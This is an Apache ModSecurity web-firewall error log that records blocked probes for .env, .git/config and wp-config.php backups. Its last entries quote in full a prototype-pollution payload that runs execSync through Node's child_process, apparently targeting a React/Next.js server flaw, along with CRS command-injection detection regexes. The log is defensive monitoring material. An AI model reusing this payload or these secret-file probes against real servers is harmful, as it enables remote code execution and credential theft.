[Thu Jan 15 02:46:57.179119 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWhHEfr_2TO49pGIjpB53wAAAAM"]
[Thu Jan 15 02:46:57.179285 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aWhHEfr_2TO49pGIjpB53wAAAAM"]
[Thu Jan 15 02:46:57.200549 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54AAAAAM"]
[Thu Jan 15 02:46:57.200740 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54AAAAAM"]
[Thu Jan 15 02:46:57.200919 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54AAAAAM"]
[Thu Jan 15 02:46:57.222252 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54QAAAAM"]
[Thu Jan 15 02:46:57.222460 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54QAAAAM"]
[Thu Jan 15 02:46:57.222640 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWhHEfr_2TO49pGIjpB54QAAAAM"]
[Thu Jan 15 02:46:57.245640 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWhHEfr_2TO49pGIjpB54gAAAAM"]
[Thu Jan 15 02:46:57.245822 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWhHEfr_2TO49pGIjpB54gAAAAM"]
[Thu Jan 15 02:46:57.245974 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWhHEfr_2TO49pGIjpB54gAAAAM"]
[Thu Jan 15 02:46:57.267199 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWhHEfr_2TO49pGIjpB54wAAAAM"]
[Thu Jan 15 02:46:57.267366 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWhHEfr_2TO49pGIjpB54wAAAAM"]
[Thu Jan 15 02:46:57.267524 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWhHEfr_2TO49pGIjpB54wAAAAM"]
[Thu Jan 15 02:46:57.290724 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWhHEfr_2TO49pGIjpB55AAAAAM"]
[Thu Jan 15 02:46:57.290841 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWhHEfr_2TO49pGIjpB55AAAAAM"]
[Thu Jan 15 02:46:57.291020 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWhHEfr_2TO49pGIjpB55AAAAAM"]
[Thu Jan 15 02:46:57.291163 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWhHEfr_2TO49pGIjpB55AAAAAM"]
[Thu Jan 15 02:46:57.357329 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWhHEfr_2TO49pGIjpB55gAAAAM"]
[Thu Jan 15 02:46:57.357604 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWhHEfr_2TO49pGIjpB55gAAAAM"]
[Thu Jan 15 02:46:57.357752 2026] [:error] [pid 1420005] [client 195.178.110.132:31296] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWhHEfr_2TO49pGIjpB55gAAAAM"]
[Thu Jan 15 10:19:57.756097 2026] [:error] [pid 1422355] [client 135.232.201.234:17927] [client 135.232.201.234] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWixPS53m_0LZQFyCeSgoAAAAAI"]
[Thu Jan 15 10:19:57.756387 2026] [:error] [pid 1422355] [client 135.232.201.234:17927] [client 135.232.201.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWixPS53m_0LZQFyCeSgoAAAAAI"]
[Thu Jan 15 10:19:57.756550 2026] [:error] [pid 1422355] [client 135.232.201.234:17927] [client 135.232.201.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWixPS53m_0LZQFyCeSgoAAAAAI"]
[Thu Jan 15 10:39:19.123159 2026] [:error] [pid 1422353] [client 195.178.110.191:19282] [client 195.178.110.191] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWi1x-HSrxAFNBAHObbgMwAAAAA"]
[Thu Jan 15 10:39:19.123570 2026] [:error] [pid 1422353] [client 195.178.110.191:19282] [client 195.178.110.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWi1x-HSrxAFNBAHObbgMwAAAAA"]
[Thu Jan 15 10:39:19.123749 2026] [:error] [pid 1422353] [client 195.178.110.191:19282] [client 195.178.110.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aWi1x-HSrxAFNBAHObbgMwAAAAA"]
[Thu Jan 15 10:39:19.426031 2026] [:error] [pid 1422354] [client 195.178.110.191:31484] [client 195.178.110.191] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWi1x79cPrphjC1uJYw56gAAAAE"]
[Thu Jan 15 10:39:19.426273 2026] [:error] [pid 1422354] [client 195.178.110.191:31484] [client 195.178.110.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWi1x79cPrphjC1uJYw56gAAAAE"]
[Thu Jan 15 10:39:19.426439 2026] [:error] [pid 1422354] [client 195.178.110.191:31484] [client 195.178.110.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWi1x79cPrphjC1uJYw56gAAAAE"]
[Thu Jan 15 10:58:02.875780 2026] [:error] [pid 1422357] [client 85.11.167.4:39952] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768471082_3081',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6KvDjrFi-ACGrsdg_gAAAAAQ"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:02.875986 2026] [:error] [pid 1422357] [client 85.11.167.4:39952] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768471082_3081',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6KvDjrFi-ACGrsdg_gAAAAAQ"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:02.876081 2026] [:error] [pid 1422357] [client 85.11.167.4:39952] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1768471082_3081 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6KvDjrFi-ACGrsdg_gAAAAAQ"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:02.877239 2026] [:error] [pid 1422357] [client 85.11.167.4:39952] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6KvDjrFi-ACGrsdg_gAAAAAQ"], referer: https://economiasolidale.38121.it
[Thu Jan 15 10:58:02.877421 2026] [:error] [pid 1422357] [client 85.11.167.4:39952] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aWi6KvDjrFi-ACGrsdg_gAAAAAQ"], referer: https://economiasolidale.38121.it
